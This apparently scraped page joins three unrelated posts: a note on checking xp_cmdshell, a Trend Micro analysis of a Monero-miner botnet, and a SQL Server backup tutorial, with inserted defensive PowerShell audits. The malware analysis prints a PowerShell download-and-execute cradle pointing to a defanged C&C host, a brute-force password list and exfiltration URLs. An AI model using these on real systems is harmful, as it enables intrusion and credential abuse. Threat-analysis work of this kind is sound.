#Check if "xp_cmdshell" is enabled
gaurava16fc · 8 years ago
T-SQL: Find if "xp_cmdshell" is configured on your SQL Server instance
Hi Friends,
How are you doing?
Today, we will see how to check if the “xp_cmdshell” is already configured on your SQL Server instance or not. We can check the other configurations as well using the same T-SQL.
What is “xp_cmdshell”?
“xp_cmdshell” allows us to run Windows commands from SQL Server, but we need to enable it first!
We can check if this configuration is already configured on this…
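The check the post describes, as an added PowerShell example that is not code from the original post: it reads the running value of xp_cmdshell (and the two options usually toggled with it) from sys.configurations, lists any explicit EXECUTE grants on the procedure, and reports whether a proxy credential exists for non-sysadmin callers. The instance name HQDBT01, Windows authentication and a login that can read master are assumptions.

```powershell
# Added example (not from the original post). Assumes Windows authentication to $Instance,
# a login that can read master, and the .NET SqlClient provider that ships with Windows PowerShell.
function Get-XpCmdShellState {
    param([Parameter(Mandatory = $true)][string]$Instance)

    $conn = New-Object System.Data.SqlClient.SqlConnection(
        "Server=$Instance;Database=master;Integrated Security=SSPI")
    $conn.Open()
    try {
        # Three result sets in one round trip. value_in_use is the running value;
        # value alone can differ until RECONFIGURE has been executed.
        $query = @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

SELECT pr.name AS grantee, pe.state_desc, pe.permission_name
FROM   sys.database_permissions pe
JOIN   sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE  pe.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

SELECT name, credential_identity
FROM   sys.credentials
WHERE  name = '##xp_cmdshell_proxy_account##';
"@
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $query
        $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($cmd)
        $ds = New-Object System.Data.DataSet
        [void]$adapter.Fill($ds)   # one DataTable per result set

        $config = @{}
        foreach ($row in $ds.Tables[0].Rows) { $config[$row.name] = [int]$row.value_in_use }

        [pscustomobject]@{
            Instance          = $Instance
            XpCmdShellEnabled = ($config['xp_cmdshell'] -eq 1)
            AdvancedOptions   = ($config['show advanced options'] -eq 1)
            OleAutomation     = ($config['Ole Automation Procedures'] -eq 1)
            # Explicit grants only: members of sysadmin can always execute it and never appear here
            ExecuteGrants     = @($ds.Tables[1].Rows | ForEach-Object {
                                    "$($_.grantee): $($_.state_desc) $($_.permission_name)" })
            ProxyAccount      = @($ds.Tables[2].Rows | ForEach-Object { $_.credential_identity })
        }
    }
    finally {
        $conn.Close()
    }
}

# Instance name is an assumption; run against each instance you want audited.
Get-XpCmdShellState -Instance 'HQDBT01' | Format-List
```

A true XpCmdShellEnabled with a non-empty ExecuteGrants list means a non-sysadmin login can spawn operating-system commands through the instance; a proxy account defined there tells you which Windows identity those commands run as.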
terabitweb · 6 years ago
Original Post from Trend Micro Author: Trend Micro
By Augusto Remillano II and Arvin Macaraeg
We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.
It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.
Propagation and Behavior
The primary propagation technique of the malware (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) is to try a list of weak credentials to log into other computers on the network. Instead of sending itself directly to every connected system, the remote command changes the firewall and port-forwarding settings of the infected machines and sets up a scheduled task that downloads and executes an updated copy of the malware. The downloaded PowerShell script is executed with
IEX (New-Object Net.WebClient).downloadstring('hxxp://v.beahh[.]com/wm?hp')
123456
password
PASSWORD
football
welcome
1
12
21
123
321
1234
12345
123123
123321
111111
654321
666666
121212
000000
222222
888888
1111
555555
1234567
12345678
123456789
987654321
admin
abc123
abcd1234
abcd@1234
abc@123
p@ssword
P@ssword
p@ssw0rd
P@ssw0rd
P@SSWORD
P@SSW0RD
P@$$w0rd
P@$$word
P@$$w0rd
iloveyou
monkey
login
passw0rd
master
hello
qazwsx
password1
qwerty
baseball
qwertyuiop
superman
1qaz2wsx
fuckyou
123qwe
zxcvbn
pass
aaaaaa
love
administrator
Table 1. List of weak passwords used for primary propagation.
It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:
Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.
The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.
Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.
If successful, it deletes the file %Start Menu%\Programs\Startup\run.bat, likely a dropped file of an older version of the malware. It also drops the following:
%Application Data%\flashplayer.tmp
%Application Data%\sign.txt – used to indicate that the machine is already infected
%Start Menu%\Programs\Startup\FlashPlayer.lnk – responsible for executing the script flashplayer.tmp at startup
If the user has a stronger password, the malware uses EternalBlue to propagate.
Figure 3. Exploit payload.
Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.
Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.
To check whether the malware already installed its components it looks for the following files:
%Temp%\kkk1.log
%Temp%\pp2.log
%Temp%\333.log
%Temp%\kk4.log
%Temp%\kk5.log
Figure 5. Checking for installed malware components.
With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and, if the flag is still unset, installs a scheduled task to run it regularly. The behavior of the malware depends on the privilege level it was run with. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.
Figure 6. $flag and $flag2 for scheduled tasks.
The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:
Computer Name
Machine’s GUID
MAC Address
OS Version
Graphics Memory Information
System Time
The fourth component is a Python-compiled binary executable that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).
Figure 7. Dropping the fourth executable component.
Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.
The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.
Figure 9. Scanning for vulnerable database servers.
The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.
The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.
Figure 10. PowerShell script that downloads and executes the miner payload.
Figure 11. Executing the miner payload.
Conclusion
We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs itself using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and the growing amount of publicly available open-source code, we can expect to see more complicated malware like this. And while the system information collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to each machine and may be used to trace, identify, and track users and activities.
Figure 12. Malware’s new URL.
We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also apply virtual patches from credible sources. As of this writing, the malware is still active and has been updated to connect to a new URL. Use strong, unique passwords and enable multi-factor authentication wherever possible. Enterprises are also advised to deploy multi-layered protection that can actively block these threats and malicious URLs from the gateway to the endpoint.
Indicators of Compromise
SHA256                                                            Detection
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41  Trojan.PS1.MIMIKATZ.ADW
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e  Trojan.PS1.LUDICROUZ.A
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397  TrojanSpy.Win32.BEAHNY.THCACAI
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13  Trojan.PS1.PCASTLE.B
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330  HackTool.Win32.Impacket.AI
URLs
hxxp://down[.]beahh[.]com/c32.dat
hxxp://down[.]beahh[.]com/new.dat?allv5
hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version}&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target
hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version}&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://p[.]beahh[.]com/upgrade.php
hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version}&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://v[.]beahh[.]com/wm?hp
hxxp://v[.]y6h[.]net/g?h
hxxp://v[.]y6h[.]net/g?l
lplp1[.]abbny[.]com:443
lplp1[.]ackng[.]com:443
lplp1[.]beahh[.]com:443
  Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.
The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on the Trend Micro blog.
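Sweeping a host for the artifacts listed in the analysis above, as an added PowerShell example that is not part of the Trend Micro write-up. It checks every user profile for the dropped files, every scheduled task for a PowerShell download cradle or one of the IOC domains, and the PowerShell script block log (event ID 4104) for the same patterns. The file names, domains and cradle string come from the write-up; the function name, the profile roots under C:\Users and the seven-day log window are this example's assumptions.

```powershell
# Added example (not from the original analysis). Run elevated; add
# C:\Windows\System32\config\systemprofile to -ProfileRoots if the malware may have run as SYSTEM.
function Find-MinerArtifacts {
    [CmdletBinding()]
    param(
        # Every profile, because the dropped files land under whichever account the malware ran as
        [string[]]$ProfileRoots = (Get-ChildItem 'C:\Users' -Directory | ForEach-Object { $_.FullName }),
        [int]$LogDays = 7
    )
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Kind, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Kind = $Kind; Detail = $Detail })
    }

    # C&C domains from the IOC list and the download cradle from the propagation section
    $domains = 'beahh.com', 'ackng.com', 'abbny.com', 'y6h.net'
    $cradle  = 'downloadstring'

    # 1. Dropped files: %Application Data% = AppData\Roaming, %Start Menu% = AppData\Roaming\Microsoft\Windows\Start Menu,
    #    %Temp% = AppData\Local\Temp, relative to each profile root
    $relativePaths = @(
        'AppData\Roaming\flashplayer.tmp',
        'AppData\Roaming\sign.txt',
        'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk',
        'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat',
        'AppData\Local\Temp\kkk1.log',
        'AppData\Local\Temp\pp2.log',
        'AppData\Local\Temp\333.log',
        'AppData\Local\Temp\kk4.log',
        'AppData\Local\Temp\kk5.log'
    )
    foreach ($root in $ProfileRoots) {
        foreach ($rel in $relativePaths) {
            $p = Join-Path $root $rel
            if (Test-Path -LiteralPath $p) { Add-Finding 'DroppedFile' $p }
        }
    }

    # 2. Scheduled tasks (the persistence the malware installs) whose action contains the cradle or a C&C domain
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            $cmdline = "$($a.Execute) $($a.Arguments)"
            if ($cmdline -match $cradle -or ($domains | Where-Object { $cmdline -match [regex]::Escape($_) })) {
                Add-Finding 'ScheduledTask' "$($task.TaskPath)$($task.TaskName): $cmdline"
            }
        }
    }

    # 3. Script block logging: the IEX (New-Object Net.WebClient).downloadstring(...) stage is logged as 4104
    #    when script block logging is enabled, even though nothing is written to disk
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddDays(-$LogDays) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue   # no events is not an error here
    foreach ($e in $events) {
        $text = $e.Message
        if ($text -match "IEX.*Net\.WebClient.*$cradle" -or ($domains | Where-Object { $text -match [regex]::Escape($_) })) {
            Add-Finding 'ScriptBlockLog' ("{0:s} RecordId={1}" -f $e.TimeCreated, $e.RecordId)
        }
    }
    return $findings
}

Find-MinerArtifacts | Format-Table -AutoSize
```

The task and event checks catch the in-memory stages (the dropper and the reflectively injected miner leave no executable on disk); the file check catches the startup-folder persistence and the $flagX marker files. Treat a ScriptBlockLog hit with no DroppedFile hit as an infection that may have moved on to a newer component set rather than as a false positive.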
marcosplavsczyk · 8 years ago
Eighty-two percent of enterprises expect the number of databases to increase over the next twelve months. An increase in data volumes can have negative effects on the performance of databases. Think about the storage requirement and backup strategy needed to meet the Recovery Time Objective and the Recovery Point Objective. RPO and RTO are two of the most important parameters of a disaster recovery or data protection plan.
Database backup overview
Let us take a look at some of the most common ways to back up the SQL Server database, and some of the best and most feasible solutions for data protection and disaster recovery scenarios.
Let us focus on handling huge volumes of data using various techniques and methodologies. Some of us may have questions such as:
how to decide the best-suited backup strategy for our environment;
how to automate and manage SQL Server database backups, and whether to do so with T-SQL, SSIS, PowerShell or some other tool or technique;
what data recovery and protection plans are available;
whether the SQL engine provides the capability to schedule a job and run it across multiple servers;
whether customization options are available;
whether we have a robust method to perform the backup activity.
Let's find out the answers to those questions. I'm sure you'll not be disappointed!
Getting started
A database administrator must make sure that all databases are backed up across environments. Understanding the importance of database backup is critical. Setting the right recovery objective is vital, and hence we need to consider the backup options carefully. Configuring the retention period for backup files is another area that must be handled carefully.
Backing up data regularly is always a good strategy; on the other hand, backup copies must be restored and validated regularly, so that they can be relied on when a system fails, data is corrupted or, under extreme conditions, a disaster strikes. The well-tested SQL Server database backup script that we're going to discuss provides an essential safeguard for the (critical) data stored in SQL Server databases. Backups are also very important for preserving modifications to the data on a regular basis.
With a well-configured SQL Server database backup, one can recover data from many failures such as:
Hardware failures
User-generated accidents
Catastrophic disasters
Let us now look at the various options and methodologies which can be used to initiate a database backup.
There are different ways to back up a database:
SSMS – Backups can be performed manually using SQL Server Management Studio
SQL Agent Job – Using a T-SQL script for backup
Using Maintenance Plan – SSIS Packages
SMO (SQL Server Management Objects) – PowerShell Scripts
Using ApexSQL Backup
This article talks about the use of SQL Server Management Objects (SMO) and its advantages in making life easier. SMO is a complete library of programmatically accessible objects that enable an application to manage a running instance of Microsoft SQL Server. PowerShell is used to create this SQL Server database backup script using the SMO classes. The script backs up specific or all databases of an instance to the backup location (a local, remote or network share) and manages the backup files as per the retention period set.
Let’s look at how other DBAs in the industry are tackling massive data growth, what their most important goals are, and strategy to backup SQL Server databases automatically. Let us also look at some of the third party tools for backup management.
The first three options are discussed in detail in the How to backup multiple SQL Server databases automatically article. Now that the first three points are already covered, let's look at the PowerShell SMO option and at ApexSQL Backup. We'll learn how we can improve database performance and eliminate downtime to give users the best experience possible using ApexSQL Backup. Today's challenge is to give customers the most visually appealing and contextually rich insights possible in a user-friendly interface. ApexSQL Backup has the features needed to manage and deploy a SQL backup plan to many SQL instances. A good way to start is to test the feasibility by downloading the free trial version of the tool.
Initial preparation
The goal of many organizations is to manage the backup of SQL Server databases automatically. We’ll go through the necessary steps to create the PowerShell SQL Server database backup script shortly. We can list any number of SQL servers and databases using the script. We can also create multiple jobs to initiate backup on multiple servers.
Pre-requisites
Enable XP_CMDSHELL. This is needed only because the job step below launches PowerShell through xp_cmdshell. Keep in mind that xp_cmdshell is disabled by default and is a standard target for attackers who obtain a SQL login, so consider a PowerShell or CmdExec job step type instead (neither requires xp_cmdshell); if you do enable it, grant EXECUTE on xp_cmdshell only to the login that runs the job.
EXEC sp_configure 'show advanced options', 1;
GO
-- To update the currently configured value for advanced options.
RECONFIGURE;
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1;
GO
-- To update the currently configured value for this feature.
RECONFIGURE;
GO
Before you proceed, set the execution policy on PowerShell
Load the necessary modules if they’re not loaded automatically
Add full rights on file share or local or remote location where you’d like the backups stored
Make sure the account running the script has BACKUP DATABASE and BACKUP LOG permissions. By default these are held by members of the sysadmin fixed server role and of the db_owner and db_backupoperator fixed database roles.
The script covers the following:
Handling multiple SQL Server databases automatically
Managing local or remote database backups
Email notification upon completion of every successful backup
Setting the retention period
Scheduling automated jobs
Constructing the PowerShell script
Let us walk through the script, step-by-step, along with looking at the details of the setup and configuration of the script. The complete script can be found in Appendix (A)
Step 1: Declare the variable, and load the SMO library
Step 2: Define the email functionality
Step 3: Looping through databases
Step 4: Initiate Database backup and Email body preparation
Step 5: Manage database backup file
Let’s now go about using this script to back up the database by scheduling an SQL Job. Using Object Explorer, expand the SQL Server Agent. Right-click on Jobs. Select New job.
In the General tab of the window that pops up, enter the name, owner and the description for the job. Let’s call this SQLBackupCentralizedJob.
In the Steps tab, click on New to configure the job.
In the General tab,
Mention the step name as SQLBackup,
Set the job type to Transact-SQL script (T-SQL)
Select the master database in the Database box.
Paste the following script that will be used for this job in the Command box. Click OK.
master..xp_cmdshell 'PowerShell.exe F:\PowerSQL\MSSQLBackup.ps1'
Click OK.
We have now successfully created the job.
Right-click on SQLBackupCentralizedJob and run it.
We can check the backup folder for the backup files; the script also reports its progress as it runs. It is invoked once per server, like so:
Get-SQLDBBackup -SQLServer HQDBT01 -BackupDirectory f:\SQLBackup -dbList "SQLShack_Demo,ApexSQLBackup" -retention 3 -Mail Yes
Get-SQLDBBackup -SQLServer HQDBSP18 -BackupDirectory f:\PowerSQL -dbList "SafetyDB,rtc,rtcab1" -retention 3 -Mail Yes
Verify the email
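The same Agent job created through SMO, as an added example that is not the article's own code: it uses a PowerShell job step instead of a T-SQL step calling xp_cmdshell, so the xp_cmdshell prerequisite above is not needed. The job name SQLBackupCentralizedJob, the step name SQLBackup, the script path F:\PowerSQL\MSSQLBackup.ps1 and the instance HQDBT01 match the article; the daily 02:00 schedule and the function name are assumptions.

```powershell
# Added example (not from the original article). Assumes the SMO assemblies load as in Appendix (A)
# and Windows authentication to the instance.
[System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SMO") | Out-Null

function New-BackupAgentJob {
    param(
        [Parameter(Mandatory = $true)][string]$Instance,
        [string]$JobName    = 'SQLBackupCentralizedJob',
        [string]$ScriptPath = 'F:\PowerSQL\MSSQLBackup.ps1',
        [string]$StartTime  = '02:00:00'   # daily start time, hh:mm:ss (assumption)
    )
    $server    = New-Object Microsoft.SqlServer.Management.Smo.Server $Instance
    $jobServer = $server.JobServer

    if ($jobServer.Jobs.Contains($JobName)) { throw "Job '$JobName' already exists on $Instance" }

    $job = New-Object Microsoft.SqlServer.Management.Smo.Agent.Job($jobServer, $JobName)
    $job.Description = 'Multi-server SQL backup via PowerShell/SMO (no xp_cmdshell required)'
    $job.Create()

    # PowerShell subsystem: the script runs under the SQL Server Agent service account (or a proxy
    # assigned via $step.ProxyName), so that account, not a SQL login, needs write access to the backup share.
    $step = New-Object Microsoft.SqlServer.Management.Smo.Agent.JobStep($job, 'SQLBackup')
    $step.SubSystem       = [Microsoft.SqlServer.Management.Smo.Agent.AgentSubSystem]::PowerShell
    $step.Command         = "& '$ScriptPath'"
    $step.OnSuccessAction = [Microsoft.SqlServer.Management.Smo.Agent.StepCompletionAction]::QuitWithSuccess
    $step.OnFailAction    = [Microsoft.SqlServer.Management.Smo.Agent.StepCompletionAction]::QuitWithFailure
    $step.Create()

    # Daily schedule
    $schedule = New-Object Microsoft.SqlServer.Management.Smo.Agent.JobSchedule($job, 'Daily')
    $schedule.FrequencyTypes       = [Microsoft.SqlServer.Management.Smo.Agent.FrequencyTypes]::Daily
    $schedule.FrequencyInterval    = 1
    $schedule.ActiveStartTimeOfDay = [TimeSpan]::Parse($StartTime)
    $schedule.Create()

    # Without a target server the Agent never runs the job
    $job.ApplyToTargetServer($server.Name)
    return $job
}

New-BackupAgentJob -Instance 'HQDBT01' | Select-Object Name, IsEnabled, CurrentRunStatus
```

With this in place the xp_cmdshell block in the pre-requisites can stay at its default of 0, which removes one of the paths the miner described in the post above uses once it guesses a SQL password.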
Back up multiple SQL databases with ApexSQL Backup
ApexSQL Backup is a third-party software solution that can be used to define and/or manage the backup/restore processes and perform various maintenance operations. The tool is capable of performing the backup of SQL Server databases automatically.
The backup of multiple SQL databases can be configured in a few simple steps:
Step 1: Register the server
Select Home tab
Click Add button
Enter the SQL Server
Select authentication type
Click Ok
Step 2: The Backup Configuration Wizard
Now you should see all the databases that are available on that server. Click on the Backup button on the Home ribbon tab to configure the jobs.
The main tab of the backup wizard is for backup settings and defining the backup configuration. This section has three options
Backup
Select the SQL Server from the drop-down list; you can select the server you’d like to configure the backup for
In the Databases, browse and select the intended databases for backup
Click OK
Next, set the backup type, defining the backup location and its standards
Select the type of the database backup
To have a better experience, set the Job name and the Job description. It’s usually a good practice to do so.
Click on the Add Destination button, and set backup the destination path, or configure custom naming rules.
Browse for the destination path in the Folder text box.
In the Filename box, configure the format of the backup filename by clicking on the corresponding tags—you can select from the seven available tags. Each of those can be included in the backup filename. Check the summary and click OK if everything is configured as required. You can click on ApexSQL defaults to reset the configuration.
Click OK
Now, let us schedule the backup job using the Schedule wizard. This wizard is invoked using the overflow (…) button.
In the wizard, set the frequency, daily frequency and activity schedule of database backup as desired. Check the summary at the bottom of the page to confirm that the configuration is done as required. Click OK to save changes in the Schedule Wizard.
Click OK.
The Advanced tab
We can add various media, verification, compression and encryption options along with encryption settings in the Advanced tab of the wizard.
Set the retention period in the cleanup tab to clean-up the database backup files
Click OK.
Notification
Use the notification tab to set the type of alerts you would like an email notification sent for.
Use Options tab to select the notification events
Click the Add button to add recipient details
Click OK to commit.
After the configuration is complete, click OK to confirm the same. This would create backup jobs for the databases. We performed one configuration, but it created jobs for each of the databases we selected. It couldn’t get any easier! Of course, you can make individual modifications to create exceptions.
Select the Schedules view in main application form to check the jobs we created. Just like selecting the databases, you can check the box on the header to select all the schedules we created. Right-click on any of the schedules to bring up the context menu. Select Run now. The corresponding jobs will be executed immediately, irrespective of the schedule settings—this is like a force-run.
The result column shows the final status of the database backup jobs—the status of each of the jobs that have the schedule information in the central repository. If you’d like to perform an action on any one job, you can select the relevant checkbox and click on the action, such as Run now, or Disable.
The Activities tab is the central dashboard for viewing the job activities performed through ApexSQL Backup.
The message column gives user-friendly information, which is helpful in troubleshooting the backup jobs. The initial two failures as seen below are due to the fact that the database was offline. It was later fixed, and the job completed successfully in the third attempt.
The History tab shows the backup history for the database selected from the Server pane on the left.
Let us now check for the backup files that got created in the folder we specified as the backup path. We can easily recognize the backup files by their custom filenames. The creation date and time are also available. Notice the file names marked in red.
Also, here’s the summary email notification (Success and Failure)
Wrapping Up
In an environment that relies on a SQL Server database backup script, or on a managed native backup methodology, one option is PowerShell scripts using SMO. We also saw how to back up SQL Server databases automatically using scripts. PowerShell scripts are mostly sequential in nature, unless they are enhanced to run parallel processes; the latter takes significant effort to define and configure. ApexSQL Backup makes managing these processes much simpler because of its built-in options for handling these tasks more efficiently.
References
How to backup multiple SQL Server databases automatically
Using the Set-ExecutionPolicy Cmdlet
Using PowerShell and SMO to list Databases (and other stuff)
Send-MailMessage
Appendix (A)
Function Get-SQLDBBackup {
    param (
        [Parameter(Mandatory=$true, Position=0)][String]$SQLServer,
        [Parameter(Mandatory=$true, Position=1)][String]$BackupDirectory,
        [Parameter(Mandatory=$true, Position=2)][String]$dbList,
        [Parameter(Mandatory=$true, Position=3)][int]$retention,
        [Parameter(Mandatory=$true, Position=4)][String]$Mail
    )

    # Loading the SMO libraries
    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SMO") | Out-Null
    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoExtended") | Out-Null
    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.ConnectionInfo") | Out-Null
    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoEnum") | Out-Null

    # Timestamp for the backup file name in yyyyMMdd_HHmmss form, e.g. 20170619_130939
    $BackupDate = Get-Date -Format yyyyMMdd_HHmmss

    Function sendEmail {
        param($from, $to, $subject, $body, $smtpServer)
        # Send-MailMessage is the built-in SMTP cmdlet (see References)
        Send-MailMessage -From $from -To $to -Subject $subject -Body $body -SmtpServer $smtpServer
    }

    # Connect to the instance through the SMO Server class
    $Server = New-Object ("Microsoft.SqlServer.Management.Smo.Server") $SQLServer

    # Iterate over the databases of the instance and back up those named in $dbList
    foreach ($Database in $Server.Databases) {
        foreach ($db in $dbList.Split(",")) {
            if ($Database.Name -eq $db) {
                $DatabaseName = $Database.Name
                $DatabaseBackup = New-Object ("Microsoft.SqlServer.Management.Smo.Backup")
                $DatabaseBackup.Action = "Database"
                $DatabaseBackup.Database = $DatabaseName

                # Backup file: <BackupDirectory>\<database>_<timestamp>.BAK
                $BackupFileName = $BackupDirectory + "\" + $DatabaseName + "_" + $BackupDate + ".BAK"
                $DatabaseBackup.Devices.AddDevice($BackupFileName, "File")

                try {
                    Write-Progress -Activity "Please wait! Backing up SQL databases..." `
                        -Status "Processing:" -CurrentOperation "Currently processing: $DatabaseName"
                    $DatabaseBackup.SqlBackup($Server)
                    $body = "Notification that $DatabaseName was backed up successfully with date and time stamp $BackupDate"
                }
                catch {
                    $body = "Notification that the backup of $DatabaseName failed with the error message: " + $_.Exception.Message
                }
                Write-Host $body

                # Comparison must be -eq; an assignment (=) here is always true
                if ($Mail -eq 'Yes') {
                    sendEmail -To "[email protected]" -Subject "$SQLServer -> $DatabaseName Backup Status" `
                              -From "[email protected]" -Body $body -smtpServer "hqmail.abc.com"
                }

                # Build the UNC path of the backup directory so that remote servers can be cleaned up too:
                # the drive letter becomes an administrative share, e.g. \\HQDBT01\f$\SQLBackup
                $drive   = $BackupDirectory.Substring(0, 1)
                $path    = $BackupDirectory.Substring(3)
                $uncPath = "\\$SQLServer\$drive`$\$path"

                # Remove backups of this database older than the retention period (in minutes in this example)
                $file = Get-ChildItem $uncPath -Recurse -Filter "$DatabaseName*.bak" |
                        Select-Object LastWriteTime, DirectoryName, Name |
                        Where-Object { $_.LastWriteTime -lt [System.DateTime]::Now.AddMinutes(-$retention) }

                # Iterate over each file and remove it with the Remove-Item cmdlet
                foreach ($f in $file) {
                    $filename = $f.DirectoryName + '\' + $f.Name
                    Write-Host 'File deleted' $filename
                    Remove-Item $filename -Force
                }
            }
        }
    }
}

Get-SQLDBBackup -SQLServer HQDBT01 -BackupDirectory f:\SQLBackup -dbList "SQLShack_Demo,ApexSQLBackup" -retention 3 -Mail Yes
Get-SQLDBBackup -SQLServer HQDBSP18 -BackupDirectory f:\PowerSQL -dbList "SafetyDB,rtc,rtcab1" -retention 3 -Mail Yes
  The post Multi server PowerShell script to backup SQL Server databases automatically appeared first on Solution center.